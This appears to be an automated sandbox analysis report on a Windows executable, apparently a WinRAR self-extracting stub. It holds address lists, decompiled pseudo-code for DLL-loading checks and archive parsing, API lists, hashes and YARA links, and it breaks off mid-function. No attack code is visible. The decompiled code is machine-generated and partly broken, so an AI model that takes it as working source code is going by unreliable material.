          0x0020ad5c
          0x0020ad61
          0x0020ad66
          0x0020ad67
          0x0020ad6e
          0x0020ad73
          0x0020ad75
          0x0020ad77
          0x0020ad77
          0x0020ad7d
          0x0020ad84
          0x0020ad86
          0x0020ad88
          0x0020ad8e
          0x0020ad8f
          0x0020ad8f
          0x0020ad94
          0x0020ad9b
          0x0020adab
          0x0020adbe
          0x0020adbe
          0x0020adc4
          0x0020adcb
          0x0020ae7c
          0x0020ae7c
          0x0020ae83
          0x0020af2c
          0x0020af2c
          0x0020af33
          0x0020af38
          0x0020af38
          0x0020af3e
          0x0020af45
          0x0020af4c
          0x0020af56
          0x0020af56
          0x0020af5b
          0x0020af60
          0x0020af62
          0x0020af64
          0x0020af6b
          0x0020af6d
          0x0020af6f
          0x0020af70
          0x0020af75
          0x0020af76
          0x0020af78
          0x0020af82
          0x0020af7a
          0x0020af7a
          0x0020af7a
          0x0020af78
          0x0020af6b
          0x0020af88
          0x0020af8f
          0x0020af9e
          0x0020af9e
          0x00000000
          0x0020af8f
          0x0020ae89
          0x0020ae90
          0x00000000
          0x00000000
          0x0020ae96
          0x0020ae9d
          0x00000000
          0x00000000
          0x0020aea3
          0x0020aea5
          0x0020aeaa
          0x0020aeb1
          0x0020aeb1
          0x0020aeb7
          0x0020aec2
          0x0020aec2
          0x0020aec8
          0x0020aed3
          0x0020aee4
          0x0020aefc
          0x00000000
          0x0020aefc
          0x0020aeca
          0x0020aed1
          0x00000000
          0x00000000
          0x00000000
          0x0020aed1
          0x0020aeb9
          0x0020aec0
          0x00000000
          0x00000000
          0x00000000
          0x0020af01
          0x0020af01
          0x0020af02
          0x0020af02
          0x0020af0a
          0x0020af24
          0x0020af29
          0x00000000
          0x0020add1
          0x0020add1
          0x0020add3
          0x0020add9
          0x0020adda
          0x0020addf
          0x0020ade4
          0x0020ade6
          0x0020ade8
          0x0020adef
          0x0020adf1
          0x0020ae05
          0x0020ae10
          0x0020ae15
          0x0020ae15
          0x0020adef
          0x0020ae16
          0x0020ae1c
          0x0020ae6f
          0x0020ae6f
          0x0020ae70
          0x0020ae76
          0x0020ae77
          0x00000000
          0x0020ae1e
          0x0020ae1f
          0x0020ae25
          0x0020ae2b
          0x00000000
          0x00000000
          0x0020ae2d
          0x0020ae34
          0x00000000
          0x00000000
          0x0020ae36
          0x0020ae38
          0x0020ae3e
          0x0020ae3f
          0x0020ae44
          0x0020ae4b
          0x00000000
          0x00000000
          0x0020ae61
          0x0020ae67
          0x0020ae69
          0x0020a75d
          0x0020a75d
          0x0020a763
          0x0020a763
          0x0020a687
          0x0020a688
          0x0020afa4
          0x0020afa4
          0x0020afa6
          0x0020afac
          0x0020afb6
          0x0020afb6
          0x00000000
          0x0020ae69
          0x0020ae1c
          0x0020adcb
          0x0020a61d
          0x0020a620
          0x0020a634
          0x0020a634
          0x00000000
          0x0020a634
          0x0020a625
          0x0020a625
          0x0020a628
          0x0020a693
          0x0020a69a
          0x0020a732
          0x0020a732
          0x0020a742
          0x0020a748
          0x0020a74f
          0x0020a769
          0x0020a770
          0x0020a784
          0x0020a78a
          0x0020a791
          0x0020a793
          0x0020a7a5
          0x0020a7b4
          0x0020a7b6
          0x0020a7b6
          0x0020a7bc
          0x0020a7c2
          0x0020a7c9
          0x0020a7e6
          0x0020a7f3
          0x0020a816
          0x0020a81b
          0x0020a81e
          0x0020a7cb
          0x0020a7d0
          0x0020a7d0
          0x0020a827
          0x0020a82c
          0x0020a833
          0x0020a83c
          0x0020a83c
          0x0020a841
          0x0020a84b
          0x0020a84c
          0x0020a84f
          0x0020a85c
          0x0020a85d
          0x0020a85f
          0x0020a872
          0x0020a87e
          0x0020a880
          0x0020a883
          0x0020a885
          0x0020a898
          0x0020a898
          0x0020a89b
          0x0020a89b
          0x0020a8a1
          0x0020a8a3
          0x0020a912
          0x0020a912
          0x0020a916
          0x0020ab5a
          0x0020ab60
          0x0020ab6a
          0x0020ab82
          0x0020ab88
          0x0020ab95
          0x0020aba0
          0x0020aba2
          0x0020aba4
          0x0020abaf
          0x0020abaf
          0x0020abb8
          0x0020abb8
          0x0020abbe
          0x0020abc0
          0x0020abc6
          0x0020abc7
          0x0020abcc
          0x0020abce
          0x0020abd4
          0x0020abd5
          0x0020abda
          0x0020abdf
          0x0020abe0
          0x0020abe6
          0x0020abeb
          0x0020abed
          0x0020abf3
          0x0020abfa
          0x0020abfb
          0x0020ac00
          0x0020ac07
          0x0020ac09
          0x0020ac10
          0x0020ac12
          0x0020ac19
          0x0020ac1b
          0x0020ac1d
          0x0020ac23
          0x0020ac24
          0x0020ac24
          0x0020ac19
          0x0020ac10
          0x0020ac2c
          0x0020ac31
          0x0020ac31
          0x0020ac38
          0x00000000
          0x0020ac38
          0x0020a91c
          0x0020a923
          0x0020a923
          0x0020a926
          0x0020a926
          0x0020a928
          0x0020a92c
          0x0020a92e
          0x0020aaf0
          0x0020aaf0
          0x0020aaf4
          0x0020ab04
          0x0020ab1d
          0x0020ab2b
          0x0020ab45
          0x0020ab4a
          0x0020ab4a
          0x0020a685
          0x0020a685
          0x00000000
          0x0020a685
          0x0020a942
          0x0020a953
          0x0020a959
          0x0020a95e
          0x0020a97b
          0x0020a980
          0x0020a983
          0x0020a990
          0x0020a997
          0x0020a9a0
          0x0020a9b8
          0x0020a9bb
          0x0020a9c2
          0x0020a9c5
          0x0020a9c8
          0x0020a9d5
          0x0020a9d7
          0x0020a9da
          0x0020a9dc
          0x0020aa67
          0x0020a9e2
          0x0020a9e2
          0x0020a9e9
          0x0020a9ef
          0x0020a9f1
          0x0020a9fe
          0x0020a9fe
          0x0020aa0a
          0x0020aa16
          0x0020aa22
          0x0020aa2d
          0x0020aa34
          0x0020aa39
          0x0020aa57
          0x0020aa5a
          0x0020aa5f
          0x0020aa5f
          0x0020aa6e
          0x0020aa82
          0x0020aa93
          0x0020aa98
          0x0020aa9a
          0x0020aad4
          0x0020aad7
          0x00000000
          0x0020aa9c
          0x0020aaa4
          0x0020aaaa
          0x0020aaaa
          0x0020aaaa
          0x0020aaae
          0x0020aab1
          0x0020aab1
          0x0020aab4
          0x00000000
          0x00000000
          0x0020aab8
          0x0020aac1
          0x0020aac2
          0x0020aac5
          0x0020aac8
          0x00000000
          0x00000000
          0x00000000
          0x0020aac8
          0x0020aacd
          0x0020aada
          0x0020aada
          0x0020aade
          0x0020aae1
          0x0020aaea
          0x0020aaea
          0x00000000
          0x0020aade
          0x0020aa9a
          0x0020a8a5
          0x0020a8a7
          0x00000000
          0x00000000
          0x0020a8c1
          0x0020a8c6
          0x0020a8cf
          0x0020a8d4
          0x0020a8de
          0x0020a8e0
          0x0020a8e7
          0x0020a8ec
          0x0020a8ef
          0x0020a8f1
          0x0020a8f3
          0x0020a8f5
          0x0020a8f8
          0x0020a8fa
          0x0020a8fa
          0x0020a8f8
          0x0020a8fd
          0x0020a8fd
          0x0020a8fd
          0x0020a907
          0x0020a90c
          0x00000000
          0x0020a90c
          0x0020a887
          0x0020a889
          0x0020a88c
          0x0020a88f
          0x00000000
          0x00000000
          0x0020a891
          0x0020a893
          0x00000000
          0x0020a861
          0x0020a861
          0x0020a863
          0x0020a866
          0x0020a86d
          0x0020a86f
          0x00000000
          0x0020a86f
          0x0020a868
          0x0020a86b
          0x00000000
          0x00000000
          0x00000000
          0x0020a86b
          0x0020a772
          0x0020a774
          0x0020a775
          0x0020a777
          0x0020ac3d
          0x0020ac3d
          0x0020ac44
          0x00000000
          0x00000000
          0x0020ac4a
          0x0020ac4c
          0x00000000
          0x00000000
          0x0020ac57
          0x0020ac65
          0x0020ac6b
          0x0020ac71
          0x0020ac74
          0x0020ac7f
          0x0020ac89
          0x0020ac89
          0x0020ac8e
          0x0020ac91
          0x0020ac76
          0x0020ac76
          0x0020ac76
          0x0020ac9a
          0x0020aca8
          0x00000000
          0x0020aca8
          0x0020a770
          0x0020a753
          0x0020a754
          0x0020a75b
          0x00000000
          0x00000000
          0x00000000
          0x0020a75b
          0x0020a6a0
          0x0020a6a7
          0x00000000
          0x0020a6ad
          0x0020a6ad
          0x0020a6b4
          0x0020a6b9
          0x0020a6bb
          0x0020a6ca
          0x0020a6d2
          0x0020a6d5
          0x0020a724
          0x0020a724
          0x0020a72b
          0x0020a72d
          0x0020a72d
          0x0020a6dd
          0x0020a6e4
          0x00000000
          0x00000000
          0x0020a6f3
          0x0020a6f9
          0x0020a6fb
          0x00000000
          0x0020a701
          0x0020a706
          0x0020a70c
          0x0020a70e
          0x0020a714
          0x0020a71e
          0x0020a71e
          0x00000000
          0x0020a70e
          0x0020a6fb
          0x00000000
          0x0020a724
          0x0020a6a7
          0x0020a62a
          0x0020a62a
          0x0020a62d
          0x0020a668
          0x0020a669
          0x0020a670
          0x0020a676
          0x00000000
          0x00000000
          0x0020a678
          0x0020a67f
          0x00000000
          0x00000000
          0x00000000
          0x0020a67f
          0x0020a62f
          0x0020a632
          0x0020a64b
          0x0020a650
          0x0020a652
          0x0020a65e
          0x0020a65e
          0x00000000
          0x0020a652
          0x00000000
          0x0020a632
          0x0020a609
          0x0020a60b
          0x00000000

          APIs
          • __EH_prolog.LIBCMT ref: 0020A5D6
            • Part of subcall function 001F12D7: GetDlgItem.USER32(00000000,00003021), ref: 001F131B
            • Part of subcall function 001F12D7: SetWindowTextW.USER32(00000000,002222E4), ref: 001F1331
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: H_prologItemTextWindow
          • String ID: "%s"%s$,>"$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
          • API String ID: 810644672-564354363
          • Opcode ID: b4fcaf916e731667e0efa78a0e045037b60ed4f4edf6b670037ef93f5496a710
          • Instruction ID: dccaccb08fa1c5869625d891496bf87182ec7875511d3c6970fa1cb5c7a22d4a
          • Opcode Fuzzy Hash: b4fcaf916e731667e0efa78a0e045037b60ed4f4edf6b670037ef93f5496a710
          • Instruction Fuzzy Hash: 4242E5B1954309BAEB359FA0AC8DFFE3768AB16700F844055FA01A60E3C7B54D65CF62
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FFD49, Relevance: 100.1, APIs: 22, Strings: 35, Instructions: 314libraryfileloaderCOMMON
          Download Yara Rule
          C-Code - Quality: 76%
          			E001FFD49(void* __edx, char _a3, long _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, CHAR* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
				char _v1;
				long _v4;
				char* _t118;
				void* _t126;
				int _t130;
				long _t141;
				int _t167;
				_Unknown_base(*)()* _t176;
				_Unknown_base(*)()* _t177;
				signed char _t184;
				struct _SECURITY_ATTRIBUTES* _t195;
				long _t197;
				void* _t198;
				struct HINSTANCE__* _t201;
				signed int _t203;
				signed int _t205;
				void* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E0020D940();
				_push(_t207);
				_a3 = 0;
				_t201 = GetModuleHandleW(L"kernel32");
				if(_t201 == 0) {
					L5:
					_t118 =  *0x22d080; // 0x222884
					_t208 = _t207 | 0xffffffff;
					_t202 = 0x800;
					_a8 = L"version.dll";
					_a12 = L"DXGIDebug.dll";
					_a16 = L"sfc_os.dll";
					_a20 = L"SSPICLI.DLL";
					_a24 = L"rsaenh.dll";
					_a28 = L"UXTheme.dll";
					_a32 = L"dwmapi.dll";
					_a36 = L"cryptbase.dll";
					_a40 = L"lpk.dll";
					_a44 = L"usp10.dll";
					_a48 = L"clbcatq.dll";
					_a52 = L"comres.dll";
					_a56 = L"ws2_32.dll";
					_a60 = L"ws2help.dll";
					_a64 = L"psapi.dll";
					_a68 = L"ieframe.dll";
					_a72 = L"ntshrui.dll";
					_a76 = L"atl.dll";
					_a80 = L"setupapi.dll";
					_a84 = L"apphelp.dll";
					_a88 = L"userenv.dll";
					_a92 = L"netapi32.dll";
					_a96 = L"shdocvw.dll";
					_a100 = L"crypt32.dll";
					_a104 = L"msasn1.dll";
					_a108 = L"cryptui.dll";
					_a112 = L"wintrust.dll";
					_a116 = L"shell32.dll";
					_a120 = L"secur32.dll";
					_a124 = L"cabinet.dll";
					_a128 = L"oleaccrc.dll";
					_a132 = L"ntmarta.dll";
					_a136 = L"profapi.dll";
					_a140 = L"WindowsCodecs.dll";
					_a144 = L"srvcli.dll";
					_a148 = L"cscapi.dll";
					_a152 = L"slc.dll";
					_a156 = L"imageres.dll";
					_a160 = L"dnsapi.DLL";
					_a164 = L"iphlpapi.DLL";
					_a168 = L"WINNSI.DLL";
					_a172 = L"netutils.dll";
					_a176 = L"mpr.dll";
					_a180 = L"devrtl.dll";
					_a184 = L"propsys.dll";
					_a188 = L"mlang.dll";
					_a192 = L"samcli.dll";
					_a196 = L"samlib.dll";
					_a200 = L"wkscli.dll";
					_a204 = L"dfscli.dll";
					_a208 = L"browcli.dll";
					_a212 = L"rasadhlp.dll";
					_a216 = L"dhcpcsvc6.dll";
					_a220 = L"dhcpcsvc.dll";
					_a224 = L"XmlLite.dll";
					_a228 = L"linkinfo.dll";
					_a232 = L"cryptsp.dll";
					_a236 = L"RpcRtRemote.dll";
					_a240 = L"aclui.dll";
					_a244 = L"dsrole.dll";
					_a248 = L"peerdist.dll";
					if( *_t118 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a772, _t202);
						E001FFAB1( &_a9160, E001FB943(_t223,  &_a772), _t202);
						_t195 = 0;
						_t203 = 0;
						do {
							if(E001FA995() < 0x600) {
								_t126 = 0;
								__eflags = 0;
							} else {
								_t126 = E001FFCFD( *((intOrPtr*)(_t210 + 0x18 + _t203 * 4))); // executed
							}
							if(_t126 == 0) {
								L20:
								_push(0x800);
								E001FB9B9(_t227,  &_a772,  *((intOrPtr*)(_t210 + 0x1c + _t203 * 4)));
								_t130 = GetFileAttributesW( &_a760); // executed
								if(_t130 != _t208) {
									_t195 =  *((intOrPtr*)(_t210 + 0x18 + _t203 * 4));
									L24:
									if(_v1 != 0) {
										L30:
										_t234 = _t195;
										if(_t195 == 0) {
											return _t130;
										}
										E001FB98D(_t234,  &_a768);
										if(E001FA995() < 0x600) {
											_push( &_a9160);
											_push( &_a768);
											E001F3E41( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t195);
											_t210 = _t210 + 0x18;
											_t130 = AllocConsole();
											__eflags = _t130;
											if(_t130 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t141 = E00212B33( &_a4860);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t141,  &_v4, 0);
												Sleep(0x2710);
												_t130 = FreeConsole();
											}
										} else {
											E001FFCFD(L"dwmapi.dll");
											E001FFCFD(L"uxtheme.dll");
											_push( &_a9152);
											_push( &_a760);
											E001F3E41( &_a4852, 0x864, E001FDA42(_t185, 0xf1), _t195);
											_t210 = _t210 + 0x18;
											_t130 = E00209735(0,  &_a4848, E001FDA42(_t185, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t205 = 0;
									while(1) {
										_push(0x800);
										E001FB9B9(0,  &_a768,  *((intOrPtr*)(_t210 + 0x3c + _t205 * 4)));
										_t130 = GetFileAttributesW( &_a756);
										if(_t130 != _t208) {
											break;
										}
										_t205 = _t205 + 1;
										if(_t205 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t195 =  *((intOrPtr*)(_t210 + 0x38 + _t205 * 4));
									goto L30;
								}
							} else {
								_t86 = _t203 * 4; // 0x222920
								_t130 = CompareStringW(0x400, 0x1001,  *(_t210 + _t86 + 0x24), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t130 - 2;
								if(_t130 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t203 = _t203 + 1;
						} while (_t203 < 8);
						goto L24;
					}
					_t197 = E00216662(_t185, _t118);
					_pop(_t185);
					if(_t197 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4868, 0x800);
					_t206 = CreateFileW( &_a4868, 0x80000000, 1, 0, 3, 0, 0);
					if(_t206 == _t208 || SetFilePointer(_t206, _t197, 0, 0) != _t197) {
						L13:
						CloseHandle(_t206);
						_t202 = 0x800;
						goto L14;
					} else {
						_t167 = ReadFile(_t206,  &_a13260, 0x7ffe,  &_a4, 0);
						_t222 = _t167;
						if(_t167 == 0) {
							goto L13;
						}
						_t185 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
						_push( &_a252);
						_push( &_a13260);
						while(1) {
							_t198 = E001FF835(_t222);
							_t223 = _t198;
							if(_t198 == 0) {
								goto L13;
							}
							E001FFCFD( &_a252);
							_push(0x104);
							_push( &_a248);
							_push(_t198);
						}
						goto L13;
					}
				}
				_t176 = GetProcAddress(_t201, "SetDllDirectoryW");
				_t184 = _a46032;
				if(_t176 != 0) {
					asm("sbb ecx, ecx");
					_t185 =  ~(_t184 & 0x000000ff) & 0x002222e4;
					 *_t176( ~(_t184 & 0x000000ff) & 0x002222e4);
				}
				_t177 = GetProcAddress(_t201, "SetDefaultDllDirectories");
				if(_t177 != 0) {
					_t185 = ((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000;
					 *_t177(((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					_v1 = 1;
				}
				goto L5;
			}























          0x001ffd4e
          0x001ffd54
          0x001ffd5c
          0x001ffd67
          0x001ffd6b
          0x001ffdbe
          0x001ffdbe
          0x001ffdc3
          0x001ffdcc
          0x001ffdd1
          0x001ffdd9
          0x001ffde4
          0x001ffdec
          0x001ffdf4
          0x001ffdfc
          0x001ffe04
          0x001ffe0c
          0x001ffe14
          0x001ffe1c
          0x001ffe24
          0x001ffe2c
          0x001ffe34
          0x001ffe3c
          0x001ffe44
          0x001ffe4c
          0x001ffe54
          0x001ffe5c
          0x001ffe64
          0x001ffe6c
          0x001ffe74
          0x001ffe7c
          0x001ffe84
          0x001ffe8c
          0x001ffe94
          0x001ffe9c
          0x001ffea4
          0x001ffeaf
          0x001ffeba
          0x001ffec5
          0x001ffed0
          0x001ffedb
          0x001ffee6
          0x001ffef1
          0x001ffefc
          0x001fff07
          0x001fff12
          0x001fff1d
          0x001fff28
          0x001fff33
          0x001fff3e
          0x001fff49
          0x001fff54
          0x001fff5f
          0x001fff6a
          0x001fff75
          0x001fff80
          0x001fff8b
          0x001fff96
          0x001fffa1
          0x001fffac
          0x001fffb7
          0x001fffc2
          0x001fffcd
          0x001fffd8
          0x001fffe3
          0x001fffee
          0x001ffff9
          0x00200004
          0x0020000f
          0x0020001a
          0x00200025
          0x002000f3
          0x002000fe
          0x00200117
          0x00200122
          0x00200124
          0x00200126
          0x00200130
          0x0020013d
          0x0020013d
          0x00200132
          0x00200136
          0x00200136
          0x00200141
          0x00200163
          0x00200163
          0x00200174
          0x00200181
          0x00200185
          0x0020018f
          0x00200193
          0x00200198
          0x002001cc
          0x002001cc
          0x002001ce
          0x002002e5
          0x002002e5
          0x002001dc
          0x002001eb
          0x0020025a
          0x00200262
          0x00200276
          0x0020027b
          0x0020027e
          0x00200284
          0x00200286
          0x0020028f
          0x002002a4
          0x002002bc
          0x002002c7
          0x002002cd
          0x002002cd
          0x002001ed
          0x002001f2
          0x002001fc
          0x00200208
          0x00200210
          0x0020022a
          0x0020022f
          0x00200249
          0x00200249
          0x002002d5
          0x002002d5
          0x0020019a
          0x0020019c
          0x0020019c
          0x002001ad
          0x002001ba
          0x002001be
          0x00000000
          0x00000000
          0x002001c0
          0x002001c4
          0x00000000
          0x00000000
          0x00000000
          0x002001c6
          0x002001c8
          0x00000000
          0x002001c8
          0x00200143
          0x0020014a
          0x00200158
          0x0020015e
          0x00200161
          0x00000000
          0x00000000
          0x00000000
          0x00200161
          0x00200187
          0x00200187
          0x00200188
          0x00000000
          0x0020018d
          0x00200031
          0x00200033
          0x00200036
          0x00000000
          0x00000000
          0x00200047
          0x00200065
          0x00200069
          0x002000e7
          0x002000e8
          0x002000ee
          0x00000000
          0x0020007b
          0x00200090
          0x00200096
          0x00200098
          0x00000000
          0x00000000
          0x002000a0
          0x002000a2
          0x002000a7
          0x002000b6
          0x002000be
          0x002000dc
          0x002000e1
          0x002000e3
          0x002000e5
          0x00000000
          0x00000000
          0x002000c9
          0x002000ce
          0x002000da
          0x002000db
          0x002000db
          0x00000000
          0x002000dc
          0x00200069
          0x001ffd79
          0x001ffd7b
          0x001ffd84
          0x001ffd8b
          0x001ffd8d
          0x001ffd94
          0x001ffd94
          0x001ffd9c
          0x001ffda0
          0x001ffdb0
          0x001ffdb7
          0x001ffdb9
          0x001ffdb9
          0x00000000

          APIs
          • GetModuleHandleW.KERNEL32 ref: 001FFD61
          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001FFD79
          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001FFD9C
          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00200047
          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0020005F
          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00200071
          • ReadFile.KERNEL32(00000000,?,00007FFE,002228D4,00000000), ref: 00200090
          • CloseHandle.KERNEL32(00000000), ref: 002000E8
          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002000FE
          • CompareStringW.KERNELBASE(00000400,00001001, )",?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00200158
          • GetFileAttributesW.KERNELBASE(?,?,002228EC,00000800,?,00000000,?,00000800), ref: 00200181
          • GetFileAttributesW.KERNEL32(?,?,002229AC,00000800), ref: 002001BA
            • Part of subcall function 001FFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001FFD18
            • Part of subcall function 001FFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001FE7F6,Crypt32.dll,?,001FE878,?,001FE85C,?,?,?,?), ref: 001FFD3A
          • _swprintf.LIBCMT ref: 0020022A
          • _swprintf.LIBCMT ref: 00200276
            • Part of subcall function 001F3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F3E54
          • AllocConsole.KERNEL32 ref: 0020027E
          • GetCurrentProcessId.KERNEL32 ref: 00200288
          • AttachConsole.KERNEL32(00000000), ref: 0020028F
          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 002002B5
          • WriteConsoleW.KERNEL32(00000000), ref: 002002BC
          • Sleep.KERNEL32(00002710), ref: 002002C7
          • FreeConsole.KERNEL32 ref: 002002CD
          • ExitProcess.KERNEL32 ref: 002002D5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
          • String ID: )"$ *"$$+"$(,"$(-"$(."$4*"$8)"$<+"$@,"$@-"$@."$DXGIDebug.dll$L*"$P)"$P,"$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$X+"$X-"$`."$d*"$dwmapi.dll$h)"$kernel32$l,"$p+"$p-"$t*"$t."$uxtheme.dll$("$+"$,"
          • API String ID: 1201351596-3425416704
          • Opcode ID: 0501cc1bade7a6f88494b20e5de275c3a585d140fcb5947fcbb5bd2a837bd7fc
          • Instruction ID: 08a104057a9c36357c5965aa2a7db4a3092a699c856dc029496b55add0be6132
          • Opcode Fuzzy Hash: 0501cc1bade7a6f88494b20e5de275c3a585d140fcb5947fcbb5bd2a837bd7fc
          • Instruction Fuzzy Hash: C3D191B1028395FAD331DF90E848B9FB7E8BF85704F50091DF68896191CBB2865DCB62
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FCFD0, Relevance: 32.1, APIs: 4, Strings: 14, Instructions: 557COMMON
          Download Yara Rule
          C-Code - Quality: 89%
          			E001FCFD0(signed int __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t196;
				void* _t197;
				WCHAR* _t198;
				void* _t203;
				signed int _t212;
				signed int _t215;
				signed int _t218;
				signed int _t228;
				void* _t229;
				void* _t232;
				signed int _t235;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t244;
				signed int _t248;
				signed int _t262;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				void* _t274;
				signed int _t279;
				char* _t280;
				signed int _t284;
				short _t287;
				void* _t288;
				signed int _t294;
				signed int _t299;
				void* _t302;
				void* _t304;
				void* _t307;
				signed int _t316;
				signed int _t318;
				unsigned int _t328;
				signed int _t330;
				unsigned int _t333;
				signed int _t336;
				void* _t343;
				signed int _t348;
				signed int _t351;
				signed int _t352;
				signed int _t357;
				signed int _t361;
				void* _t370;
				signed int _t372;
				signed int _t373;
				void* _t374;
				void* _t375;
				intOrPtr* _t376;
				signed int _t377;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t387;
				signed int _t389;
				signed int* _t390;
				void* _t391;
				void* _t392;
				void* _t394;
				void* _t398;
				void* _t399;

				_t370 = __edx;
				_t318 = __ecx;
				_t392 = _t391 - 0x6c;
				E0020D870(E002213DF, _t390);
				E0020D940();
				_t196 = 0x5c;
				_push(0x427c);
				_push(_t390[0x1e]);
				_t387 = _t318;
				_t390[0x11] = _t196;
				_t390[0x12] = _t387;
				_t197 = E00210BB8(_t318);
				_t316 = 0;
				_t396 = _t197;
				_t198 = _t390 - 0x1264;
				if(_t197 != 0) {
					E001FFAB1(_t198, _t390[0x1e], 0x800);
				} else {
					GetModuleFileNameW(0, _t198, 0x800);
					 *((short*)(E001FB943(_t396, _t390 - 0x1264))) = 0;
					E001FFA89(_t396, _t390 - 0x1264, _t390[0x1e], 0x800);
				}
				E001F943C(_t390 - 0x2288);
				_push(4);
				 *(_t390 - 4) = _t316;
				_push(_t390 - 0x1264);
				if(E001F9768(_t390 - 0x2288, _t387) == 0) {
					L57:
					_t203 = E001F946E(_t390 - 0x2288); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t390 - 0xc));
					return _t203;
				} else {
					_t380 = _t316;
					_t398 =  *0x22d5f4 - _t380; // 0x63
					if(_t398 <= 0) {
						L7:
						E00215030(_t316, _t380, _t387,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E001FCC62);
						E00215030(_t316, _t380, _t387,  *((intOrPtr*)(_t387 + 0x14)),  *((intOrPtr*)(_t387 + 0x18)), 4, E001FCBC7);
						_t394 = _t392 + 0x20;
						_t390[0x1e] = _t316;
						_t381 = _t380 | 0xffffffff;
						_t390[0x16] = _t316;
						_t390[0x19] = _t381;
						while(_t381 == 0xffffffff) {
							_t390[0x1b] = E001F9B57();
							_t294 = E001F9979(_t370, _t390 - 0x4288, 0x2000);
							_t390[0x17] = _t294;
							_t384 = _t316;
							_t25 = _t294 - 0x10; // -16
							_t361 = _t25;
							_t390[0x15] = _t361;
							if(_t361 < 0) {
								L25:
								_t295 = _t390[0x1b];
								_t381 = _t390[0x19];
								L26:
								E001F9A4C(_t390 - 0x2288, _t390, _t295 + _t390[0x17] + 0xfffffff0, _t316, _t316);
								_t299 = _t390[0x16] + 1;
								_t390[0x16] = _t299;
								__eflags = _t299 - 0x100;
